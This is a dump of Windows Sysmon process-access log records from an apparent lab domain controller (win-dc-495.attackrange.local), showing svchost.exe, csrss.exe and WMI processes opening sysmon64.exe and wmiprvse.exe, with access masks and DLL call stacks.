13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.361{59A5CD1D-8E46-6005-1600-00000000A301}15443092C:\Windows\system32\svchost.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+ced2|C:\Windows\system32\wbem\wbemcore.dll+d531|C:\Windows\system32\wbem\wbemcore.dll+104fe|C:\Windows\system32\wbem\wbemcore.dll+25435|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c 10341000x80000000000000001683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.330{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E58-6005-4000-00000000A301}3784C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 